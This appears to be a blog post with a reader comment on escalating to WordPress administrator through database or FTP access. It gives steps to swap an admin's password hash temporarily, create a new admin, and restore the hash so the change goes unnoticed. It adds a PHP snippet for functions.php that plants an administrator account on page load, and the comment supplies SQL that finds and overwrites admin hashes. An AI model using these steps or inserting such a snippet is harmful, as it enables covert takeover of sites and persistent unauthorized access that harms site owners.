Gaining Admin Access

This is one of my favorite things to do. You need either FTP access or database access to escalate your privileges to an administrator.

Gain access through the database

 

  1. Log into a database manager.
  2. Click on the wp_users table
  3. The users_pass column will contain random looking stuff that looks like $P$BqCGBzQOJ4AHFp.2UCVafZE5q3eXNC1. This is a password hash generated with phpass. We’re going to replace this with a md5 password. WordPress will automatically convert the hash to look like the others once we log in.
  4. To generate a random password and the associated hash, on a command line type “ow –md5 –random”. You can also do this online here.
  5. If you’ve forgotten your password and want to permamently replace it, replace the hash with the one you just generated. And you’re done. If you want to escalate your privelages, ignore this step and continue on.
  6. Copy the hash of an administrative user and put in a text file
  7. change the hash to the one you just generated
  8. in a new tab login to this wordpress account with the newly generated password that went with the hash
  9. Once logged in create yourself an admin user.
  10. Go back to the database manager and replace the admin password we changed with the hash that was copied to a text file. This will restore their password.
  11. You now have admin access, and you didn’t have to permamently change anyone elses password!
Gain access through FTP

Add this snippet in the theme’s functions.php file (located at /wp-content/current-theme-name/functions.php), and then visit the website to trigger the code and create yourself an admin user. You can then delete this code from the functions.php file and login to your new admin account.

function add_admin_acct(){
	$login = 'myacct1';
	$passw = 'mypass1';
	$email = '[email protected]';

	if ( !username_exists( $login )  && !email_exists( $email ) ) {
		$user_id = wp_create_user( $login, $passw, $email );
		$user = new WP_User( $user_id );
		$user->set_role( 'administrator' );
	}
}
add_action('init','add_admin_acct');

One thought on “Gaining Admin Access”

  1. Get users:
    SELECT u.ID, u.user_login
    FROM wp_users u, wp_usermeta m
    WHERE u.ID = m.user_id
    AND m.meta_key LIKE ‘wp_capabilities’
    AND m.meta_value LIKE ‘%administrator%’

    Get password
    select user_pass from wp_users where ID=;

    hash: hu md5

    Update password
    update wp_users SET user_pass = ” where ID=;

    Verify:
    select * from wp_users where ID=;

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.